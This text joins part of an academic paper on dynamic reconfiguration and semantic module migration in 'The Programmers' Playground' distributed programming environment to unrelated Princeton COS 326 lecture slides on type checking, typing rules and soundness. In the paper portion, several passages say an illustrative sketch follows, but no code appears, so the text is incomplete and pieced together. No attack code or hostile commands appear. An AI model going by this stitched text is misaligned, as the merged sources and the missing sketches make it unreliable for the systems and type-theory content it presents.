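    std::queue<int> q;
    Module() {
        x.reaction = [this](int v) { q.push(v); };
    }
};
```

The active control can then drain `q` at its own pace, keeping computation cleanly separated from communication.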
2.3 Connections
Relationships between the data items in the presentation of different modules are created by establishing *connections* between those data items. The set of connections among published data items defines the pattern of communication among the corresponding modules. Connections are established separately from the definitions of module programs. One designs Playground modules with a local orientation, and later connects them together to form the logical configuration of the system. In this way, each module need not concern itself with the structure of its environment, but only with the behaviors exhibited at its presentation.
Playground supports two kinds of connections, *simple connections* and *element-to-aggregate* connections. A simple connection relates two data items of the same type. For example, an integer $x$ in module $A$ might be connected by a simple connection to integer $y$ in module $B$. If the simple connection is unidirectional, then the semantics of the connection is that whenever $A$ changes the value of $x$, item $y$ in module $B$ is updated with that value as well. If the simple connection is bidirectional, then an update of $y$’s value by module $B$ would also result in a corresponding update to $x$ in $A$. Arbitrary *fan-out* and *fan-in* are permitted, meaning that multiple simple connections
\footnote{Connections are sometimes called *logical connections* to contrast them with *physical connections* such as links in a computer network.}
may emanate from or converge to a given data item. For example, the integer \( x \) in the above example might also be connected to integer \( z \) in module \( C \). Then, whenever the value of \( x \) is changed, \( y \) and \( z \) are both updated. Communication is asynchronous and pairwise FIFO.
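The fan-out semantics of unidirectional simple connections can be modeled with a small sketch. This is not the Playground runtime; the `Item` template and `connect_to` are hypothetical names, and delivery is modeled synchronously rather than with the asynchronous pairwise-FIFO transport described above.

```cpp
#include <cassert>
#include <vector>

// Illustrative model of unidirectional simple connections with fan-out:
// one source item feeds several sinks of the same type. Each write to the
// source is forwarded, in order, to every connected sink.
template <typename T>
struct Item {
    T value{};
    std::vector<Item<T>*> sinks;  // fan-out: simple connections from this item

    void connect_to(Item<T>& sink) { sinks.push_back(&sink); }

    void set(const T& v) {          // an update by the owning module
        value = v;
        for (Item<T>* s : sinks)    // propagate along each connection
            s->set(v);              // a sink may itself fan out further
    }
};
```

With `x` in module $A$ connected to `y` in $B$ and `z` in $C$, a single `x.set(42)` updates both sinks, mirroring the fan-out example in the text.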
Recall that an aggregate data type is an organization of a homogeneous collection of elements, such as a set of integers or an array of tuples. The element type of an aggregate is the data type of its elements. For example, if \( s \) is a set of integers, the element type of \( s \) is "integer." An element-to-aggregate connection results when a connection is formed between a data item of type \( T \) and an aggregate data item with element type \( T \). For example, a client/server application could be constructed by having the server publish a data structure of type \( \text{set}(T) \) and having each client publish a data structure of type \( T \). If an element-to-aggregate connection is created between each client's type \( T \) data structure and the server's \( \text{set}(T) \) data structure, then the server program will see a set of client data structures, and each client may interact with the server through its individual element. Details on element-to-aggregate connections may be found elsewhere [5].
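The client/server use of an element-to-aggregate connection can be sketched as follows. The `Server`, `Client`, and `deliver` names are assumptions made for illustration; in the real system the mapping from each client's element into the server's aggregate is maintained by the protocols, not by an explicit call.

```cpp
#include <cassert>
#include <map>
#include <string>

// Hypothetical sketch of an element-to-aggregate connection: each client's
// type-T item appears as one element of the server's aggregate set(T).
struct Server {
    std::map<int, std::string> requests;  // published set(T), keyed per client
};

struct Client {
    int id;
    std::string request;  // published item of element type T
};

// Forming the connection makes the client's element visible in the
// aggregate; subsequent client updates overwrite that element.
void deliver(Server& s, const Client& c) { s.requests[c.id] = c.request; }
```

The server program simply iterates over its set of client elements, while each client interacts only with its own item.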
2.4 Playground Implementation
A logical overview of a Playground system is shown in Figure 1. A running module consists of three components: the application process, the protocol process automatically launched with the application, and a block of shared memory, managed by the veneer, that is used by both the application process and the protocol. The veneer is a software layer between the application
and the protocol that defines the Playground data types and maintains locking information for
synchrony control, as well as the documentation and protection information published with each
data structure. Reactive control information is also registered in the veneer.
The application publishes a set of data structures as its presentation. These data structures are
held in the shared memory so that they are accessible to both the application and the protocol.
The protocol runs concurrently with the application and interacts with the operating system in
order to exchange data with other Playground modules on behalf of the application. Connections
are established by a special Playground application called the connection manager. The connection
manager enforces type compatibility among the data items involved in a connection and also guards
against protection violations by establishing connections only if they satisfy the access privileges
defined for the relevant data items.
The protocol interacts with the connection manager in order to make its module’s presentation
information known to the connection manager and in order to learn about connections affecting
its module. To facilitate communication between the connection manager and the protocol of
each module, the presentation of each Playground module includes an externally readable data
structure $P$ that holds a description of the application’s presentation and an externally writable
data structure $L$ that contains link information for that module. Data structures $P$ and $L$ are used
only by the protocol and are hidden from the application.
The connection manager publishes an externally writable set of presentation descriptions $P'$
that is linked to each module’s data structure $P$ with an element-to-aggregate connection. Thus, $P'$ contains a set of presentation descriptions, one for each module in the system. The connection
manager also publishes a set $L'$ of link update records, one link update record for each module in
the system. In order for other modules, such as a front-end to the connection manager, to know about the
connectivity of the system, the connection manager publishes a set $C'$ of connections (not shown
in the figure). For a given module $m$, the element of $C'$ corresponding to $m$ contains the current
connectivity (set of links) for $m$’s published data structures.
For establishing logical connections between the presentations of various modules, the connection manager publishes a connection request data structure $R$ which may be updated externally
(using an element-to-aggregate connection) by any module in the system, usually by a graphical front-end
module for the connection manager. For each connection request placed in $R$, the connection man-
ager (through a reaction function) checks for type compatibility, verifies that the connection obeys
the access protections established for the endpoint data structures, and adds the connection to its
published link update record $L'$. This change is reflected in the $L$ data structures of the protocols
corresponding to the endpoints of the connection. In this way, each protocol is aware of each logical
connection in which it is involved. Note that the connection manager is not a communication bottleneck. The connection manager simply sets up the connections that are then handled individually
by the protocols associated with the connected data structures. It is also interesting to note that
the connection management system itself uses the I/O abstraction mechanism to establish links in
the system.
3 Dynamic Reconfiguration Mechanisms
Before proceeding with our discussion of dynamic reconfiguration, we note that the Playground
programming environment, along with the connection manager, satisfies the requirements identified
in Section 1. Requirement (R1), communication among heterogeneous hosts, is provided by the
protocol in the Playground implementation. Requirements (R2) through (R5) are fulfilled by the
fact that the logical configuration is maintained in the connection manager. The protocol and
veneer provide access to messages in transit (R6) and provide a locking mechanism and causal
broadcast algorithm for synchronizing activities (R7). Access to a module's state information (R8)
comes “for free” with the presentation, although each module may keep private data that is not
published in the presentation.
In this section, we present mechanisms for both logical and physical dynamic reconfiguration
in The Programmers’ Playground.
3.1 Logical Reconfiguration
The logical configuration in The Programmers’ Playground is maintained by the connection manager, with each protocol being aware of the connections incident to its module and carrying out
the necessary communication under the covers as directed by the veneer. For a module $M$, we say
that the set of modules having logical connections to $M$ are the peers of $M$.
Logical reconfiguration in a running Playground system may involve invoking or terminating
modules, replacing one module by another, and creating and destroying connections. When a module is started, the protocol is automatically launched and links are established with the connection manager (see Section 2.4). When a module terminates, either after completion or due to some failure, the protocol sends out all the pending messages, regarding any updates, to its peers before quitting. The connection manager will then remove the process from all of its connections [5].
We treat replacing a running module by another module as a special case of physical reconfiguration (see Section 3.2), where the module is “moved” to the same machine with replacement of the code.
When a new logical connection is created, the endpoints become aware of it through the connection manager’s presentation. The connection manager enforces type compatibility among the data items involved in a connection and also guards against protection violations by establishing connections only if they satisfy the access privileges defined for the relevant data items. When an existing connection is removed, again the endpoints become aware of it through the connection manager’s presentation. The protocols of these endpoints send out all the pending messages on this connection.
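The connection manager's admission check for a new connection can be sketched as a simple predicate. This is an illustrative model only: the `Endpoint` fields and `connection_allowed` function are assumptions, and the sketch covers just unidirectional simple connections (element-to-aggregate connections relate a type $T$ to an aggregate with element type $T$, which this predicate does not model).

```cpp
#include <cassert>
#include <string>

// Illustrative check a connection manager might run before creating a
// connection: endpoint types must match and the access privileges defined
// for the data items must permit the data flow.
struct Endpoint {
    std::string type;  // e.g. "integer", "set(integer)"
    bool readable;     // may the environment read this item?
    bool writable;     // may the environment write this item?
};

bool connection_allowed(const Endpoint& src, const Endpoint& dst) {
    if (src.type != dst.type) return false;  // type compatibility
    // protection: source must be externally readable, sink externally writable
    return src.readable && dst.writable;
}
```

A request that fails either check is simply rejected, so ill-typed or unauthorized connections never reach the protocols.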
3.2 Physical Reconfiguration
Physical reconfiguration in The Programmers’ Playground involves the reassignment of a module from one processor to another\(^3\). Any mechanism to support this migration must stop the module’s computation on the first processor, move any necessary state from the first processor to the second, and start the computation on the second processor. As defined earlier, the physical reconfiguration algorithm must guarantee that the behavior of each module involved in physical reconfiguration is the same as if the physical reconfiguration did not occur. Thus, every data transmission must occur in the appropriate order, with no such transmissions being lost or duplicated as the result of the migration. Some of the internal computation may be repeated, but the environment should not be able to tell.
Since we wish to avoid expensive state extraction techniques, moving the state information will be accomplished by moving the values in the presentation of the module. However, not all the local
\(^3\)We assume that the assignment of a physical communication path to each logical connection is handled by lower level network protocols, so we do not consider that here.
state information is necessarily exposed in the presentation of a Playground module. In fact, it is desirable to have a relatively narrow interface for interaction with the environment. If the most "important" data is exposed, though, that may be enough to restart the module. Otherwise, the module itself may provide reactive control to package up any remaining state information necessary (the mobile data) in order to move and restart the module. This is described in more detail in the module migration mechanism that we now present.
In the Playground programming environment, all the connections are logical; hence, during physical reconfiguration the connection information needs no changes. However, when a process is moved, messages from its peers somehow have to be received at the new location. When a module is to be moved, the destination module is launched in "waiting" state (see Figure 2a) at the destination machine, and an entry for the new module is created in the connection manager. In this state, only the protocol is active. The user, through the connection manager user interface, can request that the "running" module be taken over by the waiting module (see Figure 2b). The old module continues to execute normally until it receives a HALT command from the connection manager. The connection manager then updates the link information for the peers with the new
address of the module. This update is communicated to its peers using the normal I/O abstraction mechanism. Figure 2c shows peer 1 having acknowledged the connection manager and starting to send messages to the new module, with peer 2 still not having seen the update from the connection manager and still sending its messages to the old module. In both cases, the old module continues to send its messages to the peers. After all the peers acknowledge the connection manager, the connection manager sends a HALT command to the old module. Until this command is received, the old module keeps sending its messages to its peers. The peers send their messages to the new module in the destination machine only (see Figure 2d), where they are received and buffered by the new module, which awaits a hand-off message from the old module. The protocol of the old module, after receiving the HALT command from the connection manager, sends its encoded presentation (along with any other mobile data) to the destination as the hand-off message (see Figure 2e). The old module quits after receiving an acknowledgment of the hand-off message (see Figure 2f). Since each module is connected to the connection manager through the distinguished element connection, the corresponding entry for the old module is now deleted. The new module decodes the mobile data and its presentation according to the hand-off message and starts the program from the beginning. This completes the transfer, and the program runs with the transferred mobile data and presentation. Note that the connection manager participates only in the control part of reconfiguration and does not handle any data traffic.
The hand-off message is the actual transfer of control from the old module to the destination. This transfer must be handled carefully to ensure that the resulting behavior is one that could have occurred if the module had never moved. Consequently, the following steps are taken at the source machine just before sending the hand-off message (Figure 2e).
(S1) If a reaction function is running, let it complete.
(S2) Suspend active control, respecting atomic changes to the presentation.
(S3) Run an optional cleanup routine provided by the applications programmer.
(S4) Close all open files\(^4\).
(S5) Encode the presentation and mobile data, and hand-off to the destination machine.
---
\(^4\) A distributed file system is assumed so that both the source and destination processors can access the file system.
At the destination, after receiving the hand-off message the following steps are taken:
(D1) Decode the presentation and mobile data.
(D2) Run an optional restart routine provided by the applications programmer.
(D3) Restart the program with the restored presentation and mobile data.
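The ordering of steps (S1)–(S5) and (D1)–(D3) can be sketched as a trace of stand-in routines. This is not the protocol implementation; the `Migration` struct and step names are illustrative, and the hand-off "message" here is just a string standing in for the encoded presentation and mobile data.

```cpp
#include <cassert>
#include <string>
#include <vector>

// A sketch of the hand-off ordering as a trace of step names. The point is
// the order in which the mechanism invokes the source and destination steps.
struct Migration {
    std::vector<std::string> trace;
    bool reaction_running = false;
    std::string handoff;  // stand-in for encoded presentation + mobile data

    void source_side(const std::string& presentation) {
        if (reaction_running) trace.push_back("S1:finish-reaction");
        trace.push_back("S2:suspend-active-control");
        trace.push_back("S3:cleanup-routine");
        trace.push_back("S4:close-files");
        handoff = presentation;               // S5: encode and hand off
        trace.push_back("S5:send-handoff");
    }

    std::string destination_side() {
        trace.push_back("D1:decode");
        trace.push_back("D2:restart-routine");
        trace.push_back("D3:restart-program");
        return handoff;                       // restored presentation value
    }
};
```

Because the destination restarts with exactly the presentation value the source encoded, the environment sees a behavior suffix beginning with $P_v$, as required by the correctness criterion of Section 2.1.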
Playground modules can register a cleanup routine and a restart routine with the protocol using a call PGmobile(cleanup, restart) to the veneer. The veneer calls the restart function if the program is being restarted as part of reconfiguration. The cleanup routine is registered in the veneer and invoked before relocation begins. Since an ongoing reaction function is allowed to complete before reconfiguration, it is desirable to register short reaction functions. Note that a module need not take advantage of all the features of the reconfiguration mechanism. For example, it may not have active control or a restart routine.
4 Paradigms for Constructing Relocatable Modules
A module is relocatable if its behavior is unaffected by module migration. Our module migration mechanism described in Section 3.2 provides flexible support for writing relocatable modules. In this section, we identify certain guidelines for writing relocatable modules. A relocatable program under semantic migration must satisfy the following conditions.
(G1) The module must have a static presentation (only the values of the presentation entries, not the entries themselves, can change).
(G2) The module must have no covert communication with other modules.
(G3) Mobile data is declared globally. (This is an artifact of the current implementation but is not inherent to the basic mechanism.)
(G4) A cleanup function must save any internal data that is not declared mobile.
(G5) A restart function must restore any internal data that is not declared mobile.
(G6) When the module is initialized with a presentation and internal state that could have resulted from a behavior $\beta$ of the module, then the module will exhibit some behavior $\beta'$ such that $\beta\beta'$ is a correct behavior.
Note that our reconfiguration mechanism allows internal data to be stored and retrieved in separate cleanup and restart functions so that the programmer need not be concerned with reconfiguration throughout the code. We now present three different paradigms for writing relocatable modules. All three paradigms are supported by our module migration mechanism, yet they are very different in style and support a wide range of applications.
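Guidelines (G4) and (G5) can be illustrated with a minimal sketch: internal state that is not mobile is packaged by a cleanup function and restored by a restart function, so the rest of the module's code never mentions reconfiguration. All names here (`RelocatableModule`, the `mobile` map) are assumptions made for the sketch, not the veneer's API.

```cpp
#include <cassert>
#include <map>
#include <string>

// Hedged sketch of (G4)/(G5): internal data is saved into mobile data by
// cleanup and restored by restart, keeping reconfiguration out of the
// module's main logic.
struct RelocatableModule {
    int internal_counter = 0;           // internal, not published
    std::map<std::string, int> mobile;  // mobile data, declared globally (G3)

    void cleanup() {                    // (G4) save internal state
        mobile["counter"] = internal_counter;
    }
    void restart() {                    // (G5) restore internal state
        internal_counter = mobile["counter"];
    }
};
```

In a migration, the old module's `cleanup` runs before the hand-off, the mobile data travels in the hand-off message, and the new module's `restart` runs before execution resumes.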
4.1 Reactive Paradigm
The reactive paradigm is useful for programs that are not autonomous in nature, but instead interact by invocation and response, such as a database server with many clients that access the data by remote procedure calls. A migratable server can be implemented in Playground using exclusively reactive control. Certain parts of the presentation can be designated for input and the others for output. The server module is reactively invoked when its input changes, and upon completion of the request, the result is written to an output variable (that might be connected to the module that made the request).
Migration is useful for this kind of application. For example, consider a server, performing computationally intensive math functions, that is started at a general purpose machine. When a specialized machine becomes available, the server can be moved to the specialized one without the knowledge of other modules in the system. As another example, data base query processing front-ends that react to user queries can be moved closer to the data base using the reactive paradigm.
Such modules have a static presentation and use only I/O abstraction for communication, so (G1) and (G2) are satisfied. When these modules save any global data used by the reaction functions in the mobile data (G3, G4, G5), they become relocatable. The behavioral correctness (G6) follows from the fact that each invocation is processed by a reaction function and module migration does not interrupt reaction functions.
4.2 Active Restart Paradigm
The active restart paradigm is useful for programs that have long computations that should be continued after migration. To accomplish this, the programmer may provide a restart routine, which could initialize the local data structures from the mobile data.
In detail, a relocatable program is always started with a call to the PGInitialize routine,
followed by a call to the PGmobile routine (see Section 3.2). The PGmobile call restores the presentation. When a restart routine is registered with the veneer, the PGmobile routine will execute the restart routine. If the programmer knows that the program could be relocated later, he/she can declare special Playground data structures in the program and store in them certain intermediate results, along with an indication of the function that is executing. This way, the relocated program can jump to the corresponding function and avoid repeating earlier computation performed by the source module.
In order to allow the programmer to store the current results, a cleanup function can be provided by the programmer which will be invoked before the presentation is saved. The cleanup code can be used to either create a log, or to save certain important data structures from the heap into the mobile data structures. Programs handling time consuming database queries can store, in these data structures, information about how far they have searched so that it will not be lost when the programs move. The cleanup routine can also be used, as pointed out earlier, to close open streams and files.
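The active restart pattern of storing loop progress in mobile data can be sketched as follows. The `MobileState` fields are assumptions for illustration; in Playground they would be published or mobile data structures named in the PGmobile call.

```cpp
#include <cassert>

// Illustrative active-restart pattern: a long computation keeps its loop
// index and partial result in mobile data, so a relocated module resumes
// where the source left off instead of recomputing from scratch.
struct MobileState {
    long i = 0;    // how far the loop has progressed
    long sum = 0;  // partial result accumulated so far
};

// Run (or resume) the computation from wherever the mobile state says the
// source module stopped.
long sum_to(long n, MobileState& st) {
    for (; st.i < n; ++st.i)
        st.sum += st.i;
    return st.sum;
}
```

If the source machine runs partway and the mobile state then travels in the hand-off message, the destination resumes mid-loop and produces the same result as an uninterrupted run.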
4.3 Active Transaction Paradigm
Our migration algorithm is designed to respect atomicity of critical sections. Simulations and iterative calculations require active control. These programs read the presentation, take a step, and then update the presentation. Since a request for relocation may arrive in the middle of an update, each update must be atomic. Either all the variables in the presentation must be updated, or none at all and the current step aborted.
Primitives for atomic access to a set of data structures are already provided in Playground for atomic updates to the presentation. If an atomic operation involving several published data structures is required, the programmer may use the functions begin_atomic_step(obj_list) and end_atomic_step() provided by the veneer for encapsulating a set of changes as an atomic step. At the end of the atomic step, all the objects in obj_list are modified as one atomic change.
The programmer of iterative or simulation applications can use the above primitives for the objects that are to be updated at the end of each step. Since the migration algorithm always waits for the completion of any atomic step in progress before migrating, this ensures that the modules will be restarted only from consistent states.
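The commit-or-abort behavior of an atomic step can be sketched with a staged-write model. This is not the veneer's implementation: the `Presentation` struct and its methods are illustrative, modeling only the visibility guarantee that the environment sees either all of a step's updates or none of them.

```cpp
#include <cassert>
#include <map>
#include <string>

// Sketch of the atomic-step primitives: writes made between begin and end
// are staged, and all become visible together at end_atomic_step; an
// aborted step leaves the visible presentation unchanged.
struct Presentation {
    std::map<std::string, int> visible;  // what the environment sees
    std::map<std::string, int> staged;
    bool in_step = false;

    void begin_atomic_step() { in_step = true; staged.clear(); }
    void write(const std::string& k, int v) {
        if (in_step) staged[k] = v; else visible[k] = v;
    }
    void end_atomic_step() {             // commit all staged changes at once
        for (auto& kv : staged) visible[kv.first] = kv.second;
        staged.clear();
        in_step = false;
    }
    void abort_step() { staged.clear(); in_step = false; }
};
```

Because migration waits for any step in progress to complete (or abort), the hand-off always carries a presentation value from outside any atomic step, so the destination restarts from a consistent state.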
4.4 Discussion
The three paradigms discussed above are supported by the reconfiguration mechanism discussed in Section 3.2, and mixtures of these paradigms may also be useful. For example, modules written under the reactive paradigm and the active transaction paradigm need not register any restart or cleanup codes with their protocols, but nothing prevents the modules from registering these functions. In the active transaction paradigm, a cleanup and a restart function might be provided to save and restore partial results of a transaction. Similarly a program written in the active restart paradigm can also have reactive control by registering reaction functions with some of its variables.
As pointed out earlier in Section 3.1 we use physical reconfiguration, but with a slight twist, to accomplish module replacement. We treat the replacement of module $A$ by module $B$ as if it were a physical reconfiguration in which module $A$ is “moved” to the same machine, except that the code is replaced. We require that both $A$ and $B$ have the same presentation type.
5 Implementation
As of this writing, we have a Playground implementation that includes a veneer for C++, a protocol that uses TCP socket communication on top of the Solaris (UNIX) operating system, and a connection manager. The veneer contains implementations for all the basic Playground data types, tuples, and aggregates (mappings, arrays, and general purpose aggregates).
A relocatable program adds a line `PGmobile (list)` after creating its presentation. This call creates a tuple called `mobileTuple` with each object in the list as one of its fields. If cleanup and restart functions are provided in the list, they are registered with the veneer so that the veneer can call them before migration and just before execution in the migrated state. Users start the module normally or with the migrate-wait option. When the PGmobile function is called, it creates a presentation entry MIG with READONLY permission in the normal case or with WRITEONLY permission in the migrate-wait case.
Users specify migration by establishing a connection from the MIG variable in the running program to the MIG variable in the waiting program. The user interface already supports such a request, so we are able to reuse the connection specification for migration. When a migration request comes to the connection manager, the participating modules and peer protocols take
their steps (as described in Section 3.2), and the veneer of the running module encodes the `mobileTuple` and sends it to the waiting module, where it is decoded. Since `mobileTuple` is a Playground data type, the encoding and decoding of this structure come for "free." The protocols and the connection manager communicate using the facilities already part of the Playground run-time system, resulting in a significant reuse of existing objects.
6 Conclusion and Future Work
The properties of I/O abstraction, particularly the clear separation of computation from communication and the availability of a module's state information, provide advantages for reconfiguration. In this paper, we presented mechanisms for both logical and physical reconfiguration that take advantage of these properties. Process migration techniques often do not take advantage of the way program modules are written [16] and may spend time capturing unnecessary state information. Low-level state capturing is not always easy and may not work across different architectures or languages. As an alternative, we proposed semantic migration, in which the meaning, not the low-level bits, is migrated.
The Programmers' Playground is implemented not as a new programming language but instead as a layer (veneer) between each supported programming language and a protocol. In our current implementation, the veneer is written to support applications written in C++. The protocol is implemented in C++ on top of UNIX and uses TCP sockets for the underlying communication mechanism.
An important benefit of I/O abstraction is the potential for integrating discrete data and continuous data within one uniform configuration mechanism. As a testbed for this aspect of the work, we plan to use the high-speed packet-switched network that is being deployed on the Washington University campus [3]. The network, called Zeus, is based on fast packet switching technology that has been developed over the past several years and is designed to support port interfaces at up to 2.4 Gb/s. The Zeus network will allow us to implement multimedia applications that communicate using real-time digital video and audio, as well as symbolic data. Since the network makes bandwidth guarantees, the module being moved might pre-send extra data to be processed at the peers just before sending the hand-off message to the destination machine. This way the relocation
could be smooth (undetectable) even for multimedia applications.
Our reconfiguration mechanism does not allow open files to be moved when a process is relocated. One might imagine a "stable" attribute associated with certain objects provided in the veneer. Changes to these stable objects would be logged on stable storage that could be copied to the destination with the presentation. This would help in the relocation of database modules.
In this paper, we considered reconfiguration in the context of a static presentation. A program must publish its data structures before beginning execution and cannot add or remove entries from its presentation. A "changing" presentation can be achieved partially by using element-to-aggregate connections. For example, a server can publish one variable that is a set of addresses and any number of clients can talk to the server through an element-to-aggregate connection with this set. However, a fully dynamic presentation may be needed for other purposes, for example protection or temporary communication. The problem of writing relocatable modules with fully dynamic presentations remains to be addressed.
References
APPENDIX
A An Example of a Migratory Program
```
0 // work.cc: Program to do some work 100 times
1 #include "PG.hh" // include the Playground veneer library headers
2 PGreal in, out; // the input and output variables
3 PGInt counter = 0; // local counter to keep track of the 100 count
4
5 // do the work once, and increment counter
6 void do_work (PGreal* object) {
7 // SET out = the result of doing the work on *object
8 counter = counter + 1;
9 }
10
11 // The main line of the program
12 main (int argc, char** argv) {
13 PGInitialize (argc, argv); // initialize the program
14 PGpublish (in, "in", WRITE_WORLD); // let values come in
15 PGpublish (out, "out", READ_WORLD); // send values out
16 PGreact (in, do_work); // call do_work if "in" changes
17 PGmobile (&in, &counter); // only addition to make program relocatable
18 while (counter < 100) {
19 // .. local computation..
20 }
21 PGterminate (); // cleanup
22 }
```
Figure 3: A relocatable program.
The module in Figure 3 does some computation 100 times. The number of times the computation is performed is maintained in the counter variable. A peer module that uses this "work" module will send its value into the in variable and will take its result from the out variable. Figure 4 shows the modules and their current logical configuration. The WORK module is in the running state and the NewWORK module is in the migrate-wait state. When a connection is established from the variable MIG in WORK to MIG in NewWORK (by clicking the mouse at the source and dragging it to the destination), physical reconfiguration takes place. Since the counter variable is also requested to be packaged in the PGmobile (&in, &counter) call (line number 17), the migrated module will have its counter updated and the NewWORK module will run for only the remaining amount of computation. Note that although the variable counter is not part of the presentation, we specified it as part of the mobile data to be transferred upon relocation.
Figure 4: Interacting modules and their configuration.
Type Checking
COS 326
David Walker
Princeton University
Implementing an Interpreter
```
let x = 3 in
x + x
```
- Parsing: Let ("x", Num 3, Binop(Plus, Var "x", Var "x"))
- Evaluation: Num 6
- Pretty Printing: 6
Implementing an Interpreter
```
let x = 3 in
x + x
```
- **Parsing**: Let ("x", Num 3, Binop(Plus, Var "x", Var "x"))
- **Type Checking**
- **Evaluation**: Num 6
- **Pretty Printing**: 6
type t = IntT | BoolT | ArrT of t * t
type x = string (* variables *)
type c = Int of int | Bool of bool
type o = Plus | Minus | LessThan
type e =
Const of c
| Op of e * o * e
| Var of x
| If of e * e * e
| Fun of x * t * e
| Call of e * e
| Let of x * e * e
Notice that we require a type annotation on the function argument. We'll see why this is required for our type checking algorithm later.
Language Syntax (BNF Definition)
t ::=
int | bool | t -> t
b -- ranges over booleans
n -- ranges over integers
x -- ranges over variable names
c ::= n | b
o ::= + | - | <
e ::= c | e o e | x | if e then e else e | λx:t.e | e e | let x = e in e
When defining how evaluation worked, we used this notation:
\[
\frac{e_1 \rightarrow^* \lambda x.e \qquad e_2 \rightarrow^* v_2 \qquad e[v_2/x] \rightarrow^* v}{e_1\ e_2 \rightarrow^* v}
\]
In English:
“if \( e_1 \) evaluates to a function with argument \( x \) and body \( e \) and \( e_2 \) evaluates to a value \( v_2 \) and \( e \) with \( v_2 \) substituted for \( x \) evaluates to \( v \) then \( e_1 \) applied to \( e_2 \) evaluates to \( v \)”
And we were also able to translate each rule into 1 case of a function in OCaml. Together all the rules formed the basis for an interpreter for the language.
This notation:
\[ e \rightarrow^* v \]
was read in English as "e evaluates to v."
It described a relation between two things – an expression e and a value v. (And e was related to v whenever e evaluated to v.)
Note also that we usually thought of e on the left as "given" and the v on the right as computed from e (according to the rules).
The typing judgement
This notation:
\[ G \vdash e : t \]
is read in English as "e has type t in context G." It is going to define how type checking works.
It describes a relation between three things – a type checking context G, an expression e, and a type t.
We are going to think of G and e as given, and we are going to compute t. The typing rules are going to tell us how.
What is the type checking context \( G \)?
Technically, I'm going to treat \( G \) as if it were a (partial) function that maps variable names to types. Notation:
\[
\begin{align*}
G(x) & \quad \text{-- look up x's type in } G \\
G, x : t & \quad \text{-- extend } G \text{ so that } x \text{ maps to } t
\end{align*}
\]
When \( G \) is empty, I'm just going to omit it. So I'll sometimes just write: \( \vdash e : t \)
Here's an example context:
x:int, y:bool, z:int
Think of a context as a series of "assumptions" or "hypotheses"
Read it as the assumption that "x has type int, y has type bool and z has type int"
In the substitution model, if you assumed x has type int, that means that when you run the code, you had better actually wind up substituting an integer for x.
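One concrete realization of this view (an assumption for illustration; the slides treat G abstractly as a partial function) is a context as an association list, with `lookup` and `extend` sketching G(x) and G, x:t:

```ocaml
(* A sketch: contexts as association lists from variable names to types. *)
type typ = IntT | BoolT | ArrT of typ * typ

type ctxt = (string * typ) list

let lookup (g : ctxt) (x : string) : typ option = List.assoc_opt x g (* G(x) *)
let extend (g : ctxt) (x : string) (t : typ) : ctxt = (x, t) :: g    (* G, x:t *)

(* The example context x:int, y:bool, z:int *)
let g : ctxt = [("x", IntT); ("y", BoolT); ("z", IntT)]
```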
Typing Contexts and Free Variables
One more bit of intuition:
If an expression e contains free variables x, y, and z then we need to supply a context G that contains types for at least x, y and z. If we don't, we won't be able to type check e.
Goal: Give rules that define the relation "G |- e : t".
To do that, we are going to give one rule for every sort of expression.
(We can turn each rule into a case of a recursive function that implements it pretty directly.)
Rule for constant booleans:
\[ G \vdash b : \text{bool} \]
English:
“boolean constants \( b \) \textit{always} have type \text{bool}, no matter what the context \( G \) is"
Rule for constant integers:
\[ G |- n : \text{int} \]
English:
“integer constants n *always* have type int, no matter what the context G is"
Rule for operators:
\[
\frac{G \vdash e_1 : t_1 \qquad G \vdash e_2 : t_2 \qquad \text{optype}(o) = (t_1, t_2, t_3)}{G \vdash e_1\ o\ e_2 : t_3}
\]
where
\[
\begin{align*}
\text{optype (+)} &= (\text{int}, \text{int}, \text{int}) \\
\text{optype (-)} &= (\text{int}, \text{int}, \text{int}) \\
\text{optype (<)} &= (\text{int}, \text{int}, \text{bool})
\end{align*}
\]
English:
“\(e_1 o e_2\) has type \(t_3\), if \(e_1\) has type \(t_1\), \(e_2\) has type \(t_2\) and \(o\) is an operator that takes arguments of type \(t_1\) and \(t_2\) and returns a value of type \(t_3\)"
**Rule for variables:**
\[
G \vdash x : G(x)
\]
**English:**
“variable \( x \) has the type given by the context"
Note: this rule explains (part) of why the context needs to provide types for all of the free variables in an expression.
**Rule for if:**
\[
\frac{G \vdash e_1 : \text{bool} \qquad G \vdash e_2 : t \qquad G \vdash e_3 : t}{G \vdash \text{if } e_1 \text{ then } e_2 \text{ else } e_3 : t}
\]
**English:**
“if e1 has type bool and e2 has type t and e3 has (the same) type t then if e1 then e2 else e3 has type t"
Rule for functions:
$$\frac{G, x:t |- e : t2}{G |- \lambda x:t.e : t \rightarrow t2}$$
English:
"if G extended with x:t proves e has type t2 then \( \lambda x:t.e \) has type t -> t2"
Rule for function call:
\[
\frac{G \vdash e_1 : t_1 \rightarrow t_2 \qquad G \vdash e_2 : t_1}{G \vdash e_1\ e_2 : t_2}
\]
English:
“if \( e_1 \) has type \( t_1 \rightarrow t_2 \) and \( e_2 \) has type \( t_1 \) then \( e_1\ e_2 \) has type \( t_2 \)"
Rule for let:
\[
\frac{G \vdash e_1 : t_1 \qquad G, x{:}t_1 \vdash e_2 : t_2}{G \vdash \text{let } x = e_1 \text{ in } e_2 : t_2}
\]
English:
“if e_1 has type t_1 and G extended with x:t_1 proves e_2 has type t_2 then let x = e_1 in e_2 has type t_2 "
A typing derivation is a "proof" that an expression is well-typed in a particular context.
Such proofs consist of a tree of valid rules, with no obligations left unfulfilled at the top of the tree (i.e., every leaf of the tree is an axiom).
notice that “int” is associated with x in the context
\[
\frac{\dfrac{G, x{:}\text{int} \vdash x : \text{int} \qquad G, x{:}\text{int} \vdash 2 : \text{int}}{G, x{:}\text{int} \vdash x + 2 : \text{int}}}{G \vdash \lambda x{:}\text{int.}\ x + 2 : \text{int} \rightarrow \text{int}}
\]
Key Properties
Good type systems are *sound*.
- ie, well-typed programs have "well-defined" evaluation
- ie, our interpreter should not raise an exception part-way through because it doesn't know how to continue evaluation
- colloquial phrase: “sound type systems do not go wrong”
Examples of OCaml expressions that go wrong:
- true + 3 (addition of booleans not defined)
- let (x,y) = 17 in ... (can’t extract fields of int)
- true (17) (can’t use a bool as if it is a function)
Sound type systems *accurately* predict run time behavior
- if e : int and e terminates then e evaluates to an integer
Soundness = Progress + Preservation
Proving soundness boils down to two theorems:
**Progress Theorem:**
If |- e : t then either:
(1) e is a value, or
(2) e --> e'
**Preservation Theorem:**
If |- e : t and e --> e' then |- e' : t
See COS 510 for proofs of these theorems.
But you have most of the necessary techniques:
Proof by induction on the structure of ...
... various inductive data types. :-}
The typing rules also define an algorithm for... type checking...
If you view G and e as inputs, the rules for “G |- e : t” tell you how to compute t (see demo code)
